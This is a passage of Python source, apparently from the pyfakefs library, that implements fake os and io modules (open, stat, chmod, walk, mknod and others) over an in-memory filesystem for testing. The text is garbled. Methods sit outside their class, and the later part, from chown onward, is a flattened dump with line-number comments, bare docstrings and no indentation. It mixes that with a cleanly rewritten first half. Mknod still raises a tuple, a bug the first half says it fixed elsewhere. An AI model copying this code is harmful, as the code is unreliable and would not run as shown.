                    self.walk(full_name, func, arg)
# line: 3114
def __getattr__(self, name):
    """Forward any non-faked attribute access to the real os.path."""
    return getattr(self._os_path, name)
# line: 3119
class FakeOsModule(object):
# line: 3130
'Uses FakeFilesystem to provide a fake os module replacement.\n\n Do not create os.path separately from os, as there is a necessary circular\n dependency between os and os.path to replicate the behavior of the standard\n Python modules. What you want to do is to just let FakeOsModule take care of\n os.path setup itself.\n\n # You always want to do this.\n filesystem = fake_filesystem.FakeFilesystem()\n my_os_module = fake_filesystem.FakeOsModule(filesystem)\n '
# line: 3132
_stat_float_times = (sys.version_info >= (2, 5))
# line: 3134
def __init__(self, filesystem, os_path_module=None):
    """Also exposes self.path (to fake os.path).

    Args:
        filesystem: FakeFilesystem used to provide file system information.
        os_path_module: (deprecated) optional FakePathModule instance.
    """
    self.filesystem = filesystem
    self.sep = filesystem.path_separator
    self.altsep = filesystem.alternative_path_separator
    self._os_module = os
    if os_path_module is not None:
        # Passing an explicit path module is deprecated; warn the caller.
        warnings.warn(FAKE_PATH_MODULE_DEPRECATION, DeprecationWarning,
                      stacklevel=2)
        self.path = os_path_module
    else:
        self.path = FakePathModule(self.filesystem, self)
    # Pick the fdopen implementation matching the Python major version.
    self.fdopen = self._fdopen_ver2 if sys.version_info < (3, 0) else self._fdopen
# line: 3156
def _fdopen(self, *args, **kwargs):
    """Redirector to open() builtin function (Python 3).

    Args:
        *args: pass through args; args[0] must be an int file descriptor.
        **kwargs: pass through kwargs.

    Returns:
        File object corresponding to the file descriptor.

    Raises:
        TypeError: if the file descriptor is not an integer.
    """
    file_des = args[0]
    if not isinstance(file_des, int):
        raise TypeError('an integer is required')
    return FakeFileOpen(self.filesystem)(*args, **kwargs)
# line: 3173
def _fdopen_ver2(self, file_des, mode='r', bufsize=None):
    """Return an open file object connected to file_des (Python 2).

    Args:
        file_des: integer file descriptor for the requested file object.
        mode: additional file flags; checked against the mode of the
            requested file object.
        bufsize: ignored (kept for signature compliance with
            __builtin__.fdopen).

    Returns:
        File object corresponding to file_des.

    Raises:
        OSError: if a bad file descriptor or incompatible mode is given.
        TypeError: if the file descriptor is not an integer.
    """
    if isinstance(file_des, int):
        try:
            return FakeFileOpen(self.filesystem).Call(file_des, mode=mode)
        except IOError as exc:
            # fdopen reports errors as OSError, not IOError.
            raise OSError(exc)
    raise TypeError('an integer is required')
# line: 3197
def _umask(self):
    """Return the current umask."""
    if self.filesystem.is_windows_fs:
        # The fake Windows filesystem has no umask concept.
        return 0
    if sys.platform == 'win32':
        # POSIX fake filesystem hosted on real Windows: use a fixed value,
        # since the host cannot report a meaningful umask.
        return 2
    # Probe the real umask: setting it is the only way to read it,
    # so set to 0 and immediately restore the previous value.
    mask = os.umask(0)
    os.umask(mask)
    return mask
# line: 3214
def open(self, file_path, flags, mode=None, dir_fd=None):
    """Return the file descriptor for a FakeFile.

    Args:
        file_path: the path to the file.
        flags: low-level bits to indicate io operation.
        mode: bits to define default permissions.
            Note: only basic modes are supported, OS-specific modes are
            ignored.
        dir_fd: If not `None`, the file descriptor of a directory,
            with `file_path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Returns:
        A file descriptor.

    Raises:
        IOError: if the path cannot be found.
        ValueError: if invalid mode is given.
        NotImplementedError: if `os.O_EXCL` is used without `os.O_CREAT`.
    """
    file_path = self._path_with_dir_fd(file_path, self.open, dir_fd)
    if (mode is None):
        if self.filesystem.is_windows_fs:
            # 438 == 0o666 — Windows default permissions.
            mode = 438
        else:
            # 511 == 0o777, reduced by the current umask.
            mode = (511 & (~ self._umask()))
    # Decode the low-level flag bits into the internal open-mode record.
    open_modes = _OpenModes(must_exist=(not (flags & os.O_CREAT)), can_read=(not (flags & os.O_WRONLY)), can_write=(flags & (os.O_RDWR | os.O_WRONLY)), truncate=(flags & os.O_TRUNC), append=(flags & os.O_APPEND), must_not_exist=(flags & os.O_EXCL))
    if (open_modes.must_not_exist and open_modes.must_exist):
        raise NotImplementedError('O_EXCL without O_CREAT mode is not supported')
    if ((not self.filesystem.is_windows_fs) and (not open_modes.can_write) and self.filesystem.Exists(file_path)):
        # POSIX allows read-only opening of directories; wrap the
        # directory object so it can be handed out as a descriptor.
        obj = self.filesystem.ResolveObject(file_path)
        if isinstance(obj, FakeDirectory):
            dir_wrapper = FakeDirWrapper(obj, file_path, self.filesystem)
            file_des = self.filesystem.AddOpenFile(dir_wrapper)
            dir_wrapper.filedes = file_des
            return file_des
    # Regular file: open in binary, honoring O_TEMPORARY (delete on close)
    # where the host os module defines it (Windows).
    str_flags = 'b'
    delete_on_close = False
    if hasattr(os, 'O_TEMPORARY'):
        delete_on_close = ((flags & os.O_TEMPORARY) == os.O_TEMPORARY)
    fake_file = FakeFileOpen(self.filesystem, delete_on_close=delete_on_close, raw_io=True)(file_path, str_flags, open_modes=open_modes)
    self.chmod(file_path, mode)
    return fake_file.fileno()
# line: 3274
def close(self, file_des):
    """Close a file descriptor.

    Args:
        file_des: integer file descriptor for the file object requested.

    Raises:
        OSError: bad file descriptor.
        TypeError: if file descriptor is not an integer.
    """
    self.filesystem.GetOpenFile(file_des).close()
# line: 3287
def read(self, file_des, num_bytes):
    """Read a number of bytes from a file descriptor.

    Args:
        file_des: integer file descriptor for the file object requested.
        num_bytes: number of bytes to read from the file.

    Returns:
        Bytes read from the file.

    Raises:
        OSError: bad file descriptor.
        TypeError: if file descriptor is not an integer.
    """
    handle = self.filesystem.GetOpenFile(file_des)
    # os.read operates at the raw-io level, not the buffered one.
    handle.raw_io = True
    return handle.read(num_bytes)
# line: 3305
def write(self, file_des, contents):
    """Write a string to a file descriptor.

    Args:
        file_des: integer file descriptor for the file object requested.
        contents: string of bytes to write to the file.

    Returns:
        Number of bytes written.

    Raises:
        OSError: bad file descriptor.
        TypeError: if file descriptor is not an integer.
    """
    handle = self.filesystem.GetOpenFile(file_des)
    # os.write operates at the raw-io level and is unbuffered:
    # sync pending state, write, and flush immediately.
    handle.raw_io = True
    handle._sync_io()
    handle.write(contents)
    handle.flush()
    return len(contents)
# line: 3326
@classmethod
def stat_float_times(cls, newvalue=None):
    """Determine whether a file's time stamps are reported as floats
    or ints.
    New in pyfakefs 2.9.

    Calling without arguments returns the current value. The value is
    shared by all instances of FakeOsModule.

    Args:
        newvalue: if True, mtime, ctime, atime are reported as floats.
            Else, as ints (rounding down). If None, the setting is left
            unchanged.

    Returns:
        The (possibly updated) current setting as a bool.
    """
    if (newvalue is not None):
        cls._stat_float_times = bool(newvalue)
    return cls._stat_float_times
# line: 3342
def fstat(self, file_des):
    """Return the os.stat-like tuple for the FakeFile object of file_des.

    Args:
        file_des: file descriptor of the filesystem object to retrieve.

    Returns:
        The FakeStatResult object corresponding to the open file.

    Raises:
        OSError: if the filesystem object doesn't exist.
    """
    # Return a copy so callers cannot mutate the stored stat result.
    return self.filesystem.GetOpenFile(file_des).GetObject().stat_result.copy()
# line: 3358
def umask(self, new_mask):
    """Change the current umask.

    Args:
        new_mask: (int) the new umask value.

    Returns:
        The old umask.

    Raises:
        TypeError: if new_mask is of an invalid type.
    """
    if not isinstance(new_mask, int):
        raise TypeError('an integer is required')
    # Swap in the new mask and hand back the previous one.
    old_mask, self.filesystem.umask = self.filesystem.umask, new_mask
    return old_mask
# line: 3376
def chdir(self, target_directory):
    """Change current working directory to target directory.

    Args:
        target_directory: path to new current working directory.

    Raises:
        OSError: if user lacks permission to enter the argument directory
            or if the target is not a directory.
    """
    target_directory = self.filesystem.ResolvePath(target_directory, allow_fd=True)
    self.filesystem.ConfirmDir(target_directory)
    directory = self.filesystem.ResolveObject(target_directory)
    # Bug fix: the original tested `st_mode | PERM_EXE`, which is always
    # non-zero, so the permission check could never trigger. Use `&` to
    # test whether the execute (search) bit is actually set.
    if not directory.st_mode & PERM_EXE:
        raise OSError(errno.EACCES, 'Fake os module: permission denied', directory)
    self.filesystem.cwd = target_directory
# line: 3395
def getcwd(self):
    """Return the fake filesystem's current working directory."""
    return self.filesystem.cwd
# line: 3399
if (sys.version_info < (3,)):

    def getcwdu(self):
        """Return current working directory as unicode. Python 2 only."""
        return unicode(self.filesystem.cwd)

else:

    def getcwdb(self):
        """Return current working directory as bytes. Python 3 only."""
        # Encode with the platform's preferred encoding, as real os.getcwdb
        # does for the filesystem encoding.
        encoding = locale.getpreferredencoding(False)
        return bytes(self.filesystem.cwd, encoding)
# line: 3409
def listdir(self, target_directory):
    """Return a list of file names in target_directory.

    Args:
        target_directory: path to the target directory within the fake
            filesystem.

    Returns:
        A list of file names within the target directory in arbitrary
        order.

    Raises:
        OSError: if the target is not a directory.
    """
    return self.filesystem.ListDir(target_directory)
# line: 3424
# listxattr only exists on Linux with Python >= 3.3.
if (sys.platform.startswith('linux') and (sys.version_info >= (3, 3))):
    def listxattr(self, path=None, follow_symlinks=True):
        """Dummy implementation that returns an empty list - used by shutil."""
        return []
# line: 3429
# os.scandir exists only on Python >= 3.5.
if (sys.version_info >= (3, 5)):
    def scandir(self, path=''):
        """Return an iterator of DirEntry objects corresponding to the
        entries in the directory given by path.

        Args:
            path: path to the target directory within the fake filesystem.

        Returns:
            An iterator to an unsorted list of os.DirEntry objects for
            each entry in path.

        Raises:
            OSError: if the target is not a directory.
        """
        return self.filesystem.ScanDir(path)
# line: 3445
def _ClassifyDirectoryContents(self, root):
    """Classify contents of a directory as files/directories.

    Args:
        root: (str) directory to examine.

    Returns:
        (tuple) `(root, dirnames, filenames)` — the same format as
        yielded by the os.walk generator.

    Raises:
        Nothing on its own, but be ready to catch exceptions generated
        by underlying mechanisms like os.listdir.
    """
    directories, non_directories = [], []
    for entry in self.listdir(root):
        # Route each entry into the matching bucket.
        if self.path.isdir(self.path.join(root, entry)):
            directories.append(entry)
        else:
            non_directories.append(entry)
    return (root, directories, non_directories)
# line: 3470
def walk(self, top, topdown=True, onerror=None, followlinks=False):
    """Perform an os.walk operation over the fake filesystem.

    Args:
        top: root directory from which to begin walk.
        topdown: determines whether to return the tuples with the root as
            the first entry (True) or as the last, after all the child
            directory tuples (False).
        onerror: if not None, function which will be called to handle the
            os.error instance provided when os.listdir() fails.
        followlinks: if True, symbolic links are followed.
            New in pyfakefs 2.9.

    Yields:
        (path, directories, nondirectories) for top and each of its
        subdirectories. See the documentation for the builtin os module
        for further details.
    """
    def do_walk(top, top_most=False):
        top = self.path.normpath(top)
        if not top_most and not followlinks and self.path.islink(top):
            return
        try:
            top_contents = self._ClassifyDirectoryContents(top)
        except OSError as exc:
            top_contents = None
            if onerror is not None:
                onerror(exc)
        if top_contents is not None:
            if topdown:
                yield top_contents
            for directory in top_contents[1]:
                # Bug fix: the link check must be applied to the full
                # path; `directory` alone is just the entry name and
                # would be resolved relative to the current directory.
                if (not followlinks and
                        self.path.islink(self.path.join(top, directory))):
                    continue
                for contents in do_walk(self.path.join(top, directory)):
                    yield contents
            if not topdown:
                yield top_contents

    return do_walk(top, top_most=True)
# line: 3514
def readlink(self, path, dir_fd=None):
    """Read the target of a symlink.

    Args:
        path: symlink to read the target of.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Returns:
        The string representing the path to which the symbolic link
        points.

    Raises:
        TypeError: if `path` is None.
        OSError: (with errno=ENOENT) if path is not a valid path, or
            (with errno=EINVAL) if path is valid, but is not a symlink.
    """
    resolved = self._path_with_dir_fd(path, self.readlink, dir_fd)
    return self.filesystem.ReadLink(resolved)
# line: 3534
def stat(self, entry_path, dir_fd=None, follow_symlinks=None):
    """Return the os.stat-like tuple for the FakeFile object of
    entry_path.

    Args:
        entry_path: path to filesystem object to retrieve.
        dir_fd: (int) if not `None`, the file descriptor of a directory,
            with `entry_path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.
        follow_symlinks: (bool) if `False` and `entry_path` points to a
            symlink, the link itself is stat'ed instead of the linked
            object. New in Python 3.3. New in pyfakefs 3.0.

    Returns:
        The FakeStatResult object corresponding to entry_path.

    Raises:
        OSError: if the filesystem object doesn't exist.
    """
    # `follow_symlinks` is only a valid keyword from Python 3.3 on.
    if follow_symlinks is not None and sys.version_info < (3, 3):
        raise TypeError("stat() got an unexpected keyword argument 'follow_symlinks'")
    follow_symlinks = True if follow_symlinks is None else follow_symlinks
    entry_path = self._path_with_dir_fd(entry_path, self.stat, dir_fd)
    return self.filesystem.GetStat(entry_path, follow_symlinks)
# line: 3559
def lstat(self, entry_path, dir_fd=None):
    """Return the os.stat-like tuple for entry_path, never following
    symlinks.

    Args:
        entry_path: path to filesystem object to retrieve.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `entry_path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Returns:
        The FakeStatResult object corresponding to `entry_path`.

    Raises:
        OSError: if the filesystem object doesn't exist.
    """
    resolved = self._path_with_dir_fd(entry_path, self.lstat, dir_fd)
    return self.filesystem.GetStat(resolved, follow_symlinks=False)
# line: 3578
def remove(self, path, dir_fd=None):
    """Remove the FakeFile object at the specified file path.

    Args:
        path: path to file to be removed.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Raises:
        OSError: if path points to a directory.
        OSError: if path does not exist.
        OSError: if removal failed.
    """
    self.filesystem.RemoveFile(self._path_with_dir_fd(path, self.remove, dir_fd))
# line: 3595
def unlink(self, path, dir_fd=None):
    """Remove the FakeFile object at the specified file path
    (alias of `remove`).

    Args:
        path: path to file to be removed.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Raises:
        OSError: if path points to a directory.
        OSError: if path does not exist.
        OSError: if removal failed.
    """
    self.filesystem.RemoveFile(self._path_with_dir_fd(path, self.unlink, dir_fd))
# line: 3612
def rename(self, old_file_path, new_file_path, dir_fd=None):
    """Rename a FakeFile object at old_file_path to new_file_path,
    preserving all properties.
    Also replaces an existing new_file_path object, if one existed
    (Unix only).

    Args:
        old_file_path: path to filesystem object to rename.
        new_file_path: path to where the filesystem object will live
            after this call.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `old_file_path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Raises:
        OSError: if old_file_path does not exist.
        OSError: if new_file_path is an existing directory.
        OSError: if new_file_path is an existing file (Windows only).
        OSError: if new_file_path is an existing file and could not be
            removed (Unix).
        OSError: if `dirname(new_file)` does not exist.
        OSError: if the file would be moved to another filesystem
            (e.g. mount point).
    """
    source = self._path_with_dir_fd(old_file_path, self.rename, dir_fd)
    self.filesystem.RenameObject(source, new_file_path)
# line: 3635
# os.replace exists only on Python >= 3.3.
if (sys.version_info >= (3, 3)):

    def replace(self, old_file_path, new_file_path):
        """Rename a FakeFile object at old_file_path to new_file_path,
        preserving all properties, replacing any existing target.
        New in pyfakefs 3.0.

        Args:
            old_file_path: path to filesystem object to rename.
            new_file_path: path to where the filesystem object will live
                after this call.

        Raises:
            OSError: if old_file_path does not exist.
            OSError: if new_file_path is an existing directory.
            OSError: if new_file_path is an existing file and could not
                be removed.
            OSError: if `dirname(new_file)` does not exist.
            OSError: if the file would be moved to another filesystem
                (e.g. mount point).
        """
        self.filesystem.RenameObject(old_file_path, new_file_path,
                                     force_replace=True)
# line: 3655
def rmdir(self, target_directory, dir_fd=None):
    """Remove a leaf fake directory.

    Args:
        target_directory: (str) name of directory to remove.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `target_directory` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Raises:
        OSError: if target_directory does not exist or is not a
            directory, or as per FakeFilesystem.RemoveObject.
            Cannot remove '.'.
    """
    resolved = self._path_with_dir_fd(target_directory, self.rmdir, dir_fd)
    self.filesystem.RemoveDirectory(resolved)
# line: 3671
def removedirs(self, target_directory):
    """Remove a leaf fake directory and all empty intermediate ones.

    Args:
        target_directory: the directory to be removed.

    Raises:
        OSError: if target_directory does not exist or is not a
            directory.
        OSError: if target_directory is not empty.
    """
    target_directory = self.filesystem.NormalizePath(target_directory)
    directory = self.filesystem.ConfirmDir(target_directory)
    if directory.contents:
        # Unlike the parent pruning below, the leaf itself must be empty.
        raise OSError(errno.ENOTEMPTY, 'Fake Directory not empty', self.path.basename(target_directory))
    else:
        self.rmdir(target_directory)
    (head, tail) = self.path.split(target_directory)
    if (not tail):
        # Path ended with a separator; split again to get the real tail.
        (head, tail) = self.path.split(head)
    # Walk up the tree, removing each parent that has become empty and
    # stopping at the first non-empty one.
    while (head and tail):
        head_dir = self.filesystem.ConfirmDir(head)
        if head_dir.contents:
            break
        self.filesystem.RemoveDirectory(head, allow_symlink=True)
        (head, tail) = self.path.split(head)
# line: 3699
def mkdir(self, dir_name, mode=PERM_DEF, dir_fd=None):
    """Create a leaf fake directory.

    Args:
        dir_name: (str) name of directory to create.
            Relative paths are assumed to be relative to '/'.
        mode: (int) mode to create directory with. Defaults to 0o777;
            the umask is applied to this mode.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `dir_name` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.

    Raises:
        OSError: if the directory name is invalid or the parent directory
            is read only, or as per FakeFilesystem.AddObject.
    """
    resolved = self._path_with_dir_fd(dir_name, self.mkdir, dir_fd)
    self.filesystem.MakeDirectory(resolved, mode)
# line: 3718
def makedirs(self, dir_name, mode=PERM_DEF, exist_ok=None):
    """Create a leaf fake directory and any non-existent parent dirs.

    Args:
        dir_name: (str) name of directory to create.
        mode: (int) mode to create directory (and any necessary parent
            directories) with. Defaults to 0o777; the umask is applied
            to this mode.
        exist_ok: (boolean) if False (the default), an OSError is raised
            if the target directory already exists.
            New in Python 3.2. New in pyfakefs 2.9.

    Raises:
        OSError: if the directory already exists and exist_ok=False, or
            as per `FakeFilesystem.CreateDirectory()`.
    """
    # `exist_ok` is only a valid keyword from Python 3.2 on.
    if exist_ok is not None and sys.version_info < (3, 2):
        raise TypeError("makedir() got an unexpected keyword argument 'exist_ok'")
    self.filesystem.MakeDirectories(dir_name, mode, exist_ok or False)
# line: 3740
def _path_with_dir_fd(self, path, fct, dir_fd):
    """Return the path considering dir_fd. Raise on invalid parameters.

    Args:
        path: the (possibly relative) path to resolve.
        fct: the bound fake-os method on whose behalf dir_fd is being
            validated; its name is used to look up the real os function
            and to build error messages.
        dir_fd: if not None, the file descriptor of a directory that
            `path` is relative to.

    Returns:
        The path, joined onto the dir_fd directory when `path` is
        relative, otherwise unchanged.
    """
    if (dir_fd is not None):
        # dir_fd is only a valid argument from Python 3.3 on.
        if (sys.version_info < (3, 3)):
            raise TypeError(("%s() got an unexpected keyword argument 'dir_fd'" % fct.__name__))
        # Check the real os function to mirror platform support for dir_fd.
        real_fct = getattr(os, fct.__name__)
        if (real_fct not in self.supports_dir_fd):
            raise NotImplementedError('dir_fd unavailable on this platform')
        if isinstance(path, int):
            raise ValueError(("%s: Can't specify dir_fd without matching path" % fct.__name__))
        if (not self.path.isabs(path)):
            # Relative path: anchor it at the directory behind dir_fd.
            return self.path.join(self.filesystem.GetOpenFile(dir_fd).GetObject().GetPath(), path)
    return path
# line: 3758
def access(self, path, mode, dir_fd=None, follow_symlinks=None):
    """Check if a file exists and has the specified permissions.

    Args:
        path: (str) path to the file.
        mode: (int) permissions represented as a bitwise-OR combination
            of os.F_OK, os.R_OK, os.W_OK, and os.X_OK.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.
        follow_symlinks: (bool) if `False` and `path` points to a symlink,
            the link itself is queried instead of the linked object.
            New in Python 3.3. New in pyfakefs 3.0.

    Returns:
        bool, `True` if the file is accessible, `False` otherwise.
    """
    if follow_symlinks is not None and sys.version_info < (3, 3):
        raise TypeError("access() got an unexpected keyword argument 'follow_symlinks'")
    path = self._path_with_dir_fd(path, self.access, dir_fd)
    try:
        stat_result = self.stat(path, follow_symlinks=follow_symlinks)
    except OSError as os_error:
        # A missing file is simply "not accessible"; anything else is real.
        if os_error.errno == errno.ENOENT:
            return False
        raise
    # Compare the requested bits against the owner permission bits.
    owner_bits = (stat_result.st_mode >> 6) & 7
    return (mode & owner_bits) == mode
# line: 3786
def chmod(self, path, mode, dir_fd=None, follow_symlinks=None):
    """Change the permissions of a file as encoded in integer mode.

    Args:
        path: (str) path to the file.
        mode: (int) permissions.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.
        follow_symlinks: (bool) if `False` and `path` points to a symlink,
            the link itself is changed instead of the linked object.
            New in Python 3.3. New in pyfakefs 3.0.
    """
    # `follow_symlinks` is only a valid keyword from Python 3.3 on.
    if follow_symlinks is not None and sys.version_info < (3, 3):
        raise TypeError("chmod() got an unexpected keyword argument 'follow_symlinks'")
    follow_symlinks = True if follow_symlinks is None else follow_symlinks
    path = self._path_with_dir_fd(path, self.chmod, dir_fd)
    self.filesystem.ChangeMode(path, mode, follow_symlinks)
# line: 3806
def lchmod(self, path, mode):
    """Change the permissions of a file as encoded in integer mode.
    If the file is a link, the permissions of the link are changed.

    Args:
        path: (str) path to the file.
        mode: (int) permissions.

    Raises:
        NameError: on a fake Windows filesystem, where lchmod is not
            available.
    """
    if self.filesystem.is_windows_fs:
        # Bug fix: the original `raise (NameError, "...")` raises a tuple,
        # which itself raises TypeError on Python 3 ("exceptions must
        # derive from BaseException"). Raise a proper NameError instance.
        raise NameError("name 'lchmod' is not defined")
    self.filesystem.ChangeMode(path, mode, follow_symlinks=False)
# line: 3818
def utime(self, path, times=None, ns=None, dir_fd=None, follow_symlinks=None):
    """Change the access and modified times of a file.

    Args:
        path: (str) path to the file.
        times: 2-tuple of int or float numbers, of the form
            (atime, mtime), used to set the access and modified times in
            seconds. If None, both times are set to the current time.
        ns: 2-tuple of int numbers, of the form (atime, mtime), used to
            set the access and modified times in nanoseconds. If None,
            both times are set to the current time.
            New in Python 3.3. New in pyfakefs 3.3.
        dir_fd: if not `None`, the file descriptor of a directory, with
            `path` being relative to this directory.
            New in Python 3.3. New in pyfakefs 3.3.
        follow_symlinks: (bool) if `False` and `path` points to a symlink,
            the link itself is queried instead of the linked object.
            New in Python 3.3. New in pyfakefs 3.0.

    Raises:
        TypeError: if anything other than the expected types is specified
            in the passed `times` or `ns` tuple, or if the tuple length
            is not equal to 2.
        ValueError: if both times and ns are specified.
    """
    # `follow_symlinks` and `ns` are only valid keywords from Python 3.3 on.
    if follow_symlinks is not None and sys.version_info < (3, 3):
        raise TypeError("utime() got an unexpected keyword argument 'follow_symlinks'")
    follow_symlinks = True if follow_symlinks is None else follow_symlinks
    path = self._path_with_dir_fd(path, self.utime, dir_fd)
    if ns is not None and sys.version_info < (3, 3):
        raise TypeError("utime() got an unexpected keyword argument 'ns'")
    self.filesystem.UpdateTime(path, times, ns, follow_symlinks)
# line: 3853
def chown(self, path, uid, gid, dir_fd=None, follow_symlinks=None):
# line: 3872
'Set ownership of a faked file.\n\n Args:\n path: (str) Path to the file or directory.\n uid: (int) Numeric uid to set the file or directory to.\n gid: (int) Numeric gid to set the file or directory to.\n dir_fd: (int) If not `None`, the file descriptor of a directory,\n with `path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n follow_symlinks: (bool) If `False` and path points to a symlink,\n the link itself is changed instead of the linked object.\n New in Python 3.3. New in pyfakefs 3.0.\n\n Raises:\n OSError: if path does not exist.\n\n `None` is also allowed for `uid` and `gid`. This permits `os.rename` to\n use `os.chown` even when the source file `uid` and `gid` are `None` (unset).\n '
# line: 3873
if (follow_symlinks is None):
# line: 3874
follow_symlinks = True
elif (sys.version_info < (3, 3)):
# line: 3876
raise TypeError("chown() got an unexpected keyword argument 'follow_symlinks'")
# line: 3877
path = self._path_with_dir_fd(path, self.chown, dir_fd)
# line: 3878
try:
# line: 3879
file_object = self.filesystem.ResolveObject(path, follow_symlinks, allow_fd=True)
# line: 3880
except IOError as io_error:
# line: 3881
if (io_error.errno == errno.ENOENT):
# line: 3882
raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
# line: 3885
raise
# line: 3886
if (not ((isinstance(uid, int) or (uid is None)) and (isinstance(gid, int) or (gid is None)))):
# line: 3888
raise TypeError('An integer is required')
# line: 3889
if (uid != (-1)):
# line: 3890
file_object.st_uid = uid
# line: 3891
if (gid != (-1)):
# line: 3892
file_object.st_gid = gid
# line: 3894
def mknod(self, filename, mode=None, device=None, dir_fd=None):
# line: 3914
"Create a filesystem node named 'filename'.\n\n Does not support device special files or named pipes as the real os\n module does.\n\n Args:\n filename: (str) Name of the file to create\n mode: (int) Permissions to use and type of file to be created.\n Default permissions are 0o666. Only the stat.S_IFREG file type\n is supported by the fake implementation. The umask is applied\n to this mode.\n device: not supported in fake implementation\n dir_fd: If not `None`, the file descriptor of a directory,\n with `filename` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if called with unsupported options or the file can not be\n created.\n "
# line: 3915
if self.filesystem.is_windows_fs:
# line: 3916
raise (AttributeError, "module 'os' has no attribute 'mknode'")
# line: 3917
if (mode is None):
# line: 3918
mode = (stat.S_IFREG | PERM_DEF_FILE)
# line: 3919
if (device or (not (mode & stat.S_IFREG))):
# line: 3920
raise OSError(errno.ENOENT, 'Fake os mknod implementation only supports regular files.')
# line: 3924
filename = self._path_with_dir_fd(filename, self.mknod, dir_fd)
# line: 3925
(head, tail) = self.path.split(filename)
# line: 3926
if (not tail):
# line: 3927
if self.filesystem.Exists(head):
# line: 3928
raise OSError(errno.EEXIST, ('Fake filesystem: %s: %s' % (os.strerror(errno.EEXIST), filename)))
# line: 3930
raise OSError(errno.ENOENT, ('Fake filesystem: %s: %s' % (os.strerror(errno.ENOENT), filename)))
# line: 3932
if (tail in ('.', u'.', '..', u'..')):
# line: 3933
raise OSError(errno.ENOENT, ('Fake fileystem: %s: %s' % (os.strerror(errno.ENOENT), filename)))
# line: 3935
if self.filesystem.Exists(filename):
# line: 3936
raise OSError(errno.EEXIST, ('Fake fileystem: %s: %s' % (os.strerror(errno.EEXIST), filename)))
# line: 3938
try:
# line: 3939
self.filesystem.AddObject(head, FakeFile(tail, (mode & (~ self.filesystem.umask)), filesystem=self.filesystem))
# line: 3942
except IOError as e:
# line: 3943
raise OSError(e.errno, ('Fake filesystem: %s: %s' % (os.strerror(e.errno), filename)))
# line: 3946
def symlink(self, link_target, path, dir_fd=None):
# line: 3958
'Creates the specified symlink, pointed at the specified link target.\n\n Args:\n link_target: The target of the symlink.\n path: Path to the symlink to create.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `link_target` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if the file already exists.\n '
# line: 3959
link_target = self._path_with_dir_fd(link_target, self.symlink, dir_fd)
# line: 3960
self.filesystem.CreateLink(path, link_target, create_missing_dirs=False)
# line: 3962
def link(self, oldpath, newpath, dir_fd=None):
# line: 3980
"Create a hard link at new_path, pointing at old_path.\n New in pyfakefs 2.9.\n\n Args:\n old_path: An existing link to the target file.\n new_path: The destination path to create a new link at.\n dir_fd: If not `None`, the file descriptor of a directory, with `oldpath`\n being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Returns:\n the FakeFile object referred to by `oldpath`.\n\n Raises:\n OSError: if something already exists at new_path.\n OSError: if the parent directory doesn't exist.\n OSError: if on Windows before Python 3.2.\n "
# line: 3981
oldpath = self._path_with_dir_fd(oldpath, self.link, dir_fd)
# line: 3982
self.filesystem.CreateHardLink(oldpath, newpath)
# line: 3984
def fsync(self, file_des):
# line: 3994
'Perform fsync for a fake file (in other words, do nothing).\n New in pyfakefs 2.9.\n\n Args:\n file_des: file descriptor of the open file.\n\n Raises:\n OSError: file_des is an invalid file descriptor.\n TypeError: file_des is not an integer.\n '
# line: 3996
self.filesystem.GetOpenFile(file_des)
# line: 3998
def fdatasync(self, file_des):
# line: 4008
'Perform fdatasync for a fake file (in other words, do nothing).\n New in pyfakefs 2.9.\n\n Args:\n file_des: file descriptor of the open file.\n\n Raises:\n OSError: file_des is an invalid file descriptor.\n TypeError: file_des is not an integer.\n '
# line: 4010
self.filesystem.GetOpenFile(file_des)
# line: 4012
def __getattr__(self, name):
# line: 4013
'Forwards any unfaked calls to the standard os module.'
# line: 4014
return getattr(self._os_module, name)
# line: 4017
class FakeIoModule(object):
# line: 4026
'Uses FakeFilesystem to provide a fake io module replacement.\n New in pyfakefs 2.9.\n\n Currently only used to wrap `io.open()` which is an alias to `open()`.\n\n You need a fake_filesystem to use this:\n filesystem = fake_filesystem.FakeFilesystem()\n my_io_module = fake_filesystem.FakeIoModule(filesystem)\n '
# line: 4028
def __init__(self, filesystem):
# line: 4032
'\n Args:\n filesystem: FakeFilesystem used to provide file system information\n '
# line: 4033
self.filesystem = filesystem
# line: 4034
self._io_module = io
# line: 4036
def open(self, file_path, mode='r', buffering=(-1), encoding=None, errors=None, newline=None, closefd=True, opener=None):
# line: 4040
'Redirect the call to FakeFileOpen.\n See FakeFileOpen.Call() for description.\n '
# line: 4041
if ((opener is not None) and (sys.version_info < (3, 3))):
# line: 4042
raise TypeError("open() got an unexpected keyword argument 'opener'")
# line: 4043
fake_open = FakeFileOpen(self.filesystem, use_io=True)
# line: 4044
return fake_open(file_path, mode, buffering, encoding, errors, newline, closefd, opener)
# line: 4046
def __getattr__(self, name):
# line: 4047
'Forwards any unfaked calls to the standard io module.'
# line: 4048
return getattr(self._io_module, name)
# line: 4051
class FakeFileWrapper(object):
# line: 4056
'Wrapper for a stream object for use by a FakeFile object.\n\n If the wrapper has any data written to it, it will propagate to\n the FakeFile object on close() or flush().\n '
# line: 4057
